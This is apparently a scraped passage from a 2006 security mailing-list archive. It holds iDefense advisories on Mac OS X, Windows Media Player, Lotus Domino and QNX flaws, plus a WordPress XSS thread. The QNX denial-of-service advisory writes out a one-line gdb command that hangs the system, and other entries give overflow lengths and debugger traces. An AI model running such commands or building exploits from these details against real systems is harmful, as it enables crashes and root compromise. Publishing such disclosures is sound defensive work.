upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 03.02.06: Apple MacOS X BOMArchiveHelper Directory Traversal Vulnerability
Apple MacOS X BOMArchiveHelper Directory Traversal Vulnerability iDefense Security Advisory 03.02.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=399 March 02, 2006 I. BACKGROUND Mac OS X is an operating system for the Apple family of microcomputers. More information is available at the following link: http://www.apple.com/macosx/ II. DESCRIPTION Remote exploitation of a directory traversal vulnerability in Apple Computer Inc.'s MacOS X could allow attackers to overwrite arbitrary files with user-supplied contents. III. ANALYSIS Exploitation could allow a remote attacker to overwrite a file with user-supplied contents. This can be leveraged to gain code execution on the target machine by overwriting executable files such as login scripts. IV. DETECTION iDefense has confirmed the existence of this vulnerability in MacOS X 10.4.2. Versions 10.4.5 and earlier of the 10.4.x family and versions 10.3.9 of the 10.3.x family of both Mac OS X and Mac OS X Server are vulnerable. V. WORKAROUND To prevent exploitation from occurring through the Safari web browser, disable the 'Open safe file types' option in Safari. To achieve this, within Safari choose Preferences, then choose General, then uncheck the 'Open safe file types' option. VI. VENDOR RESPONSE Apple has released Security Update 2006-001 to address this issue: http://docs.info.apple.com/article.html?artnum=303382 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-0391 to this issue. VIII. DISCLOSURE TIMELINE This issue was independently discovered by Stéphane Kardas of CERTA and reported to the vendor. 03/02/2006 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: WordPress 2.0.1 Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 > Risk: Critical! Impact: XSS, Full Path Disclosure, Directory > Listing Here a critical bug is an arbitrary command execution, account ownage, etc an XSS isn't at all critical... > <+ Full path disclosure & Directory listing +> When I discovered > this bug, I reported it to some pepople before public disclosure, I > was noticed that this isn't new and I decided to look why they > haven't patch this bug. so it's not that critical, medium but nothing critical ... Javor Ninov wrote: > wp-content/ is also prone to directory listing > > > Javor Ninov aka DrFrancky > > [EMAIL PROTECTED] wrote: >> /* >> --- >> [N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple >> Vulnerabilities >> --- >> Program : WordPress 2.0 Homepage: http://www.wordpress.org >> Vulnerable Versions: WordPress 2.0.1 & lower ones Risk: Critical! >> Impact: XSS, Full Path Disclosure, Directory Listing >> >> -> WordPress 2.0.1 Multiple Vulnerabilities <- >> --- >> >> - Description >> --- >> WordPress is a state-of-the-art semantic personal publishing >> platform with a focus on aesthetics, web standards, and >> usability. What a mouthful. WordPress is both free and priceless >> at the same time. >> >> - Tested >> --- >> Tested in localhost & many blogs >> >> - Bug >> --- >> The vendor was contacted about some other coding errors that are >> not described here, the vendor was noticed about these bugs when >> this advisory was published. >> >> <+ Multiple XSS +> There're multiple XSS in `post comment': >> >> [1] `name' variable is not filtered when it's assigned to `value' >> on the `' in the form when the comment it's posted. [2] >> Happends the same as [1] with `website' variable. [3] `comment', >> this variable only filtered " and ' chars, this makes possible to >> use < and >, thus this permit an attacker to inject any HTML (or >> script) code that he/she want but without any " or ' character, >> this only happends if the user that post the comment it's the >> admin (any registered kind of `user'). >> >> If you (or victim) is a unregistered user, you can use " and ' in >> your HTML/script Injection using `name' or `website' variables, >> but if the victim is the admin or a registered user these 2 >> fields described above aren't availabe in the form so you cannot >> even give a value to them. The only remaining option it's to use >> the `comment' variable but here we have the problem that we >> cannot use " or ' in HTML/SCRIPT Injected and we have to make the >> admin to post the comment (POST method). >> >> <+ Full path disclosure & Directory listing +> When I discovered >> this bug, I reported it to some pepople before public disclosure, >> I was noticed that this isn't new and I decided to look why they >> haven't patch this bug. >> >> As this bug it isn't patched yet, I tryed to know why and I found >> something like this in their forum (I don't know if the person >> that posted this was the admin but it gives the explanation): >> (Something like the following, it's not textual). `... these bugs >> are caused by badly configured .ini file, it's not a bug >> generated by the script so it cannot be accepted as a bug of >> WordPress...'. This is not an acceptable answer, if you think it >> is, a bug caused because of register_globals is Off it's .ini >> fault and not the script, they have to be kidding, if they want >> to make good software, they have to make as far as the language >> can, to prevent all bugs. >> >> There're multiple files that don't check if they are been call >> directly. This is a problem because they expect that functions >> that the script is going to be called to be declared. This kind >> of bug it's taken as a Low Risk bug, but it can help to future >> attacks. >> >> - Exploit >> --- >> -- Cross Site Scripting (XSS) PoC: [1] Post
iDefense Labs Quarterly Hacking Challenge
iDefense Labs is pleased to announce the launch of our quarterly hacking challenge. Going forward, on a quarterly basis, we will select a new focus for the challenge and outline the rules for vulnerability discoveries that will qualify for the monetary rewards. For the current quarter, iDefense Labs will pay $10,000 for each vulnerability submission that results in the publication of a Microsoft Security Bulletin with a severity rating of critical. In order to qualify, the submission must be received by midnight EST on March 31, 2006. The $10,000 prizes will be paid out following the publication of the Microsoft Security Bulletin and will be paid in addition to any amount paid for the vulnerability when it is initially accepted. Further details on the iDefense Vulnerability Contributor Program (VCP) can be found at: http://labs.idefense.com/vcp.php Further information about iDefense Labs, including access to open source tools can be found at: http://labs.idefense.com Michael Sutton Director, iDefense Labs
iDefense Security Advisory 02.14.06: Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability
Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability iDefense Security Advisory 02.14.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=393 February 14, 2006 I. BACKGROUND Windows Media Player is a full featured Audio/Visual playback application offered by Microsoft. The Windows Media Player package also contains a plugin component that can be utilized from most modern browsers such as Internet Explorer, Opera, Firefox, and Netscape. More information on the product can be found from the Microsoft Windows Media Web Site: http://www.microsoft.com/windows/windowsmedia/default.aspx II. DESCRIPTION Windows Media Player (WMP) can be launched as a plugin in popular browsers to view Windows Media Player file types from web pages. A vulnerability in the Windows Media Player plugin can be triggered from several popular browsers such as FireFox and Netscape. The issue specifically can be triggered when certain browsers launch it with an overly long embed src tag from a malicious html page. Upon successful exploitation, attackers will be able to overwrite a Structured Exception Handler (SEH) address and execute arbitrary code on the system. The vulnerability specifically lays in npdsplay.10001040 where a user supplied string is copied to a stack based buffer: 1000171A C1E9 02 SHR ECX,2 >> 1000171D F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] 1000171F 8BC8 MOV ECX,EAX III. ANALYSIS Successful exploitation of this vulnerability allows attackers to execute code within the context of the currently logged in user. The victim would have to visit a malicious website using Firefox or Netscape browsers and have Windows Media Player installed. With properly crafted input the attacker is able to execute code of his choice. Due to unicode translations, shellcode characters are somewhat limited to character code values below 0x80. Successful exploitation of this vulnerability is not significantly impacted by this limitation. IV. DETECTION This vulnerability has been tested with Windows Media Player 9 and 10, when launched from the following browsers: * Firefox .9 - Current * Netscape 8 Other versions of Windows Media Player may be vulnerable. This exploit may be able to be triggered from browsers other than those listed above. This condition does not appear to be able to be launched from Internet Explorer or Opera browsers. V. WORKAROUND This exploit can only be triggered if Windows Media Player is set as the default application to launch media file extensions. Exploitation can be prevented by remapping any media file extensions typically handled by Windows Media Player to an alternative application. This exploit can also only be launched from specific browsers. Users could use an alternative browser until an official vendor supplied patch is available. VI. VENDOR RESPONSE The vendor has issued the following security advisory for this issue: http://www.microsoft.com/technet/security/bulletin/MS06-006.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-0005 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/31/2005 Initial vendor notification 08/31/2005 Initial vendor response 02/14/2006 Coordinated public disclosure IX. CREDIT This vulnerability was submitted to iDefense by John Cobb, as well as a second researcher who wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDEFENSE Security Advisory 02.10.06: IBM Lotus Domino Server LDAP DoS Vulnerability
IBM Lotus Domino Server LDAP DoS Vulnerability iDEFENSE Security Advisory 02.10.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=389 February 10, 2006 I. BACKGROUND IBM Lotus Domino Server software provides messaging, calendaring and scheduling capabilities on a variety of operating systems. More information about the product is available from: http://www.lotus.com/products/product4.nsf/wdocs/dominohomepage II. DESCRIPTION Remote exploitation of a denial of service vulnerability in IBM Corp.'s Lotus Domino LDAP server allows attackers to crash the service, thereby preventing legitimate access. iDEFENSE is currently unaware of exploits for this vulnerability other than those maintained by iDEFENSE Labs. Vendor patches for this iDEFENSE exclusive report are currently unavailable. A workaround has been provided. The problem specifically exists within the LDAP server "nldap.exe." When sending a specially crafted bind request with a long string to the LDAP server port (389), a NULL pointer dereference occurs, resulting in a crash of the process. III. ANALYSIS Exploitation of this vulnerability allows unauthenticated remote attackers to crash the LDAP service, thereby preventing legitimate usage. This attack takes little resources to launch and can be repeated to ensure that an unpatched computer is unable to recover even after the administrator manually restarts the service. IV. DETECTION iDEFENSE has confirmed the existence of this vulnerability in Lotus Domino Server version 6.5.4. It is suspected that earlier versions of Lotus Domino Server are also affected. V. WORKAROUND Employ firewalls, access control lists or other TCP/UDP restriction mechanisms to limit access to systems and services. More specifically, limit access to TCP port 389 on the LDAP server to only allow trusted hosts to connect. VI. VENDOR RESPONSE The vendor has addressed this issue in the following products: - IBM Lotus Notes/Domino 6.5.4 FP2 - IBM Lotus Notes/Domino 6.5.5 - IBM Lotus Notes/Domino 7.0.1 The vendor has published the following technote which details patching procedures: http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21229907 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-2712 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/23/2005 Initial vendor notification 08/23/2005 Initial vendor response 02/10/2006 Coordinated public disclosure IX. CREDIT Sebastian Apelt is credited with the discovery of this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX RTOS 6.3.0 rc.local Insecure File Permissions Vulnerability
QNX RTOS 6.3.0 rc.local Insecure File Permissions Vulnerability iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=387 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ II. DESCRIPTION Local exploitation of a design vulnerability in QNX Software Systems QNX Realtime Operating System (RTOS) allows attackers to execute arbitrary commands with root privileges. The problem specifically exists because QNX RTOS 6.3.0 ships with world writable permissions on the file /etc/rc.d/rc.local. This file is parsed and executed with root privileges upon startup. An attacker can insert commands into this file which will then be executed once the operating system is restarted. III. ANALYSIS Successful exploitation allows local attackers to execute arbitrary commands with root privileges. This vulnerability when combined with a local system-wide denial of service vulnerability allows an attacker to gain immediate root privileges. IV. DETECTION iDefense has confirmed the existence of this vulnerability in QNX RTOS version 6.3.0. Version 6.0 was also tested and found to not be vulnerable. V. WORKAROUND Set more restrictive permissions on the rc.local file: chmod 644 /etc/rc.d.rc.local VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 12/24/2004 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS passwd Command Buffer Overflow
QNX Neutrino RTOS passwd Command Buffer Overflow iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=388 February 7, 2006 I. BACKGROUND QNX Neutrino RTOS is a real-time operating system designed for use in embedded systems. More information about is available at http://www.qnx.com/products/ps_neutrino. II. DESCRIPTION Local exploitation of a buffer overflow in QNX Neutrino RTOS's (QNX) 'passwd' command allows attackers to gain root privileges. The problem specifically exists in the parsing of a long string passed as the first argument to the set user id (setuid) binary 'passwd'. The 'passwd' command is intended for changing a users password. A string larger then approximately 4000 bytes causes a stack overflow directly overwriting the stored return address and allowing an attacker to seize CPU control and eventually execute arbitrary code under root privileges. III. ANALYSIS Any authenticated local attacker can exploit this vulnerability to gain super-user (root) privileges on the affected system. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in QNX Neutrino RTOS version 6.2.0. Earlier versions are suspected to be susceptible to exploitation as well. V. WORKAROUND Clear the set user id or execute bits from the affected binary or remove it entirely. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 06/04/2004 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT Texonet (www.texonet.com) is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS phgrafx Command Buffer Overflow
QNX Neutrino RTOS phgrafx Command Buffer Overflow iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=384 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ II. DESCRIPTION Local exploitation of a buffer overflow in QNX Neutrino RTOS's (QNX) 'phgrafx' command allows attackers to gain root privileges. The problem specifically exists in the parsing of a long string passed as the first argument to the set user id (setuid) binary 'phgrafx'. A string larger than approximately 1,000 bytes causes a stack overflow directly overwriting the stored return address and allowing an attacker to seize CPU control and eventually execute arbitrary code under root privileges. III. ANALYSIS Successful exploitation provides local attackers with super-user privileges on the affected system allowing for complete control. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in QNX Neutrino RTOS version 6.2.1. Earlier versions are suspected to be susceptible to exploitation as well. V. WORKAROUND Clear the set user id or execute bits from the affected binary or remove it entirely. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 08/24/2004 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT Knud Hojgaard (http://kokanin.dtors.net) is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS libph PHOTON_PATH Buffer Overflow Vulnerability
QNX Neutrino RTOS libph PHOTON_PATH Buffer Overflow Vulnerability iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=382 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ II. DESCRIPTION Local exploitation of a stack-based buffer overflow vulnerability in QNX Inc.'s Neutrino RTOS Operating System allows local attackers to gain root privileges. The vulnerability specifically exists due to improper handling of environment variables in the libph system library. The libph system library is utilized by various setuid applications that utilize the Photon API. The setitem() function fails to check bounds on the PHOTON_PATH environment variable prior to a strcpy operation. An attacker can supply an overly long value for PHOTON_PATH to overflow the stack buffer and overwrite the return address as shown here: Breakpoint 1, 0xb0343624 in strcpy () from /usr/qnx630/target/qnx6/x86/lib/libc.so.2 (gdb) bt #0 0xb0343624 in strcpy () from /usr/qnx630/target/qnx6/x86/lib/libc.so.2 #1 0xb826f58b in setitem () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #2 0xb826f7ec in additems () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #3 0xb826ffa9 in list_modify () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #4 0xb82ef2fe in PtSetValue () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #5 0xb82c7ceb in PtCompoundSetResources () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #6 0xb82ed018 in PtSetResources () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #7 0xb8244bf3 in set_list_res () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #8 0xb82ef2fe in PtSetValue () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #9 0xb82c7ceb in PtCompoundSetResources () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #10 0xb82ed018 in PtSetResources () from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3 #11 0x0804db32 in main () #12 0x in ?? () Attackers can supply a specially crafted value to overflow the buffer and execute arbitrary code. III. ANALYSIS Successful exploitation of the vulnerability allows local attackers to gain root privileges. The libph library is a core system library on Neutrino RTOS, however it has had a number of trivial vulnerabilities similar to this one. IV. DETECTION iDefense has confirmed the existence of this vulnerability on QNX Neutrino RTOS 6.3.0. All versions are suspected vulnerable. V. WORKAROUND As a workaround solution, remove the setuid bit from any programs linked to libph.so.3. An example is shown here: # ls -l /usr/photon/bin/phlocale -rwsrwxr-x 1 root root 54244 May 05 2004 /usr/photon/bin/phlocale # ldd /usr/photon/bin/phlocale /usr/photon/bin/phlocale: libAp.so.3 => /usr/lib/libAp.so.3 (0xb820) libph.so.3 => /usr/lib/libph.so.3 (0xb821) libphrender.so.2 => /usr/lib/libphrender.so.2 (0xb8312000) libm.so.2 => /lib/libm.so.2 (0xb8347000) libfont.so.1 => /lib/libfont.so.1 (0xb8363000) libc.so.2 => /usr/lib/ldqnx.so.2 (0xb030) # chmod -s /usr/photon/bin/phlocale VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 12/15/2005 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT iDefense credits Filipe Balestra ([EMAIL PROTECTED]) with the discovery of this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX RTOS 6.3.0 Local Denial of Service Vulnerability
QNX RTOS 6.3.0 Local Denial of Service Vulnerability iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=386 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ II. DESCRIPTION Local exploitation of a denial of service vulnerability in QNX Software Systems QNX Realtime Operating System (RTOS) allows attackers to crash the operating system. The problem specifically exists when a local user executes the following command: echo -e "break *0xb032d59f\nr\ncont\ncont" | gdb gdb Executing the above command causes the operating system to become unresponsive and hang. III. ANALYSIS Successful exploitation allows local attackers to crash the affected operating system. IV. DETECTION iDefense has confirmed the existence of this vulnerability in QNX RTOS version 6.3.0. Version 6.0 was also tested and found to not be vulnerable. V. WORKAROUND Remove the GNU Debugger (GDB) from affected systems. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 12/23/2004 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS su Command Buffer Overflow
QNX Neutrino RTOS su Command Buffer Overflow iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=385 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ II. DESCRIPTION Local exploitation of a buffer overflow in QNX Neutrino RTOS's (QNX) 'su' command allows attackers to gain root privileges. The problem specifically exists in the parsing of a long string passed as the first argument to the set user id (setuid) binary 'su'. The 'su' command is intended for running commands under a substitute user or group id. A string larger then approximately 4000 bytes causes a stack overflow directly overwriting the stored return address and allowing an attacker to seize CPU control and eventually execute arbitrary code under root privileges. III. ANALYSIS Any authenticated local attacker can exploit this vulnerability to gain super-user (root) privileges on the affected system. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in QNX Neutrino RTOS version 6.2.0. Earlier versions are suspected to be susceptible to exploitation as well. V. WORKAROUND Clear the set user id or execute bits from the affected binary or remove it entirely. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 06/04/2004 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT Texonet (www.texonet.com) is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS phfont Race Condition Vulnerability
QNX Neutrino RTOS phfont Race Condition Vulnerability iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ II. DESCRIPTION Local exploitation of a race condition vulnerability in QNX Neutrino RTOS's (QNX) phfont command allows attackers to gain root privileges. QNX Neutrino RTOS is a real-time operating system designed for use in embedded systems. The problem specifically exists because phfont spawns another command, phfontphf, without proper sanity checking. A local attacker can create a malicious replacement for this command and cause it to be executed in place of the original by manipulating the PHFONT and PHOTON2_PATH environment variables. phfont is installed set user id root by default. III. ANALYSIS Successful exploitation provides local attackers with super user privileges on the affected system, allowing for complete control. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in QNX Neutrino RTOS version 6.2.1. Earlier versions are also suspected to be susceptible to exploitation. V. WORKAROUND Clear the set user ID or execute bits from the affected binary or remove it entirely. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 09/29/2004 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT Knud Hojgaard (http://kokanin.dtors.net) is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: Workaround for unpatched Oracle PLSQL Gateway flaw
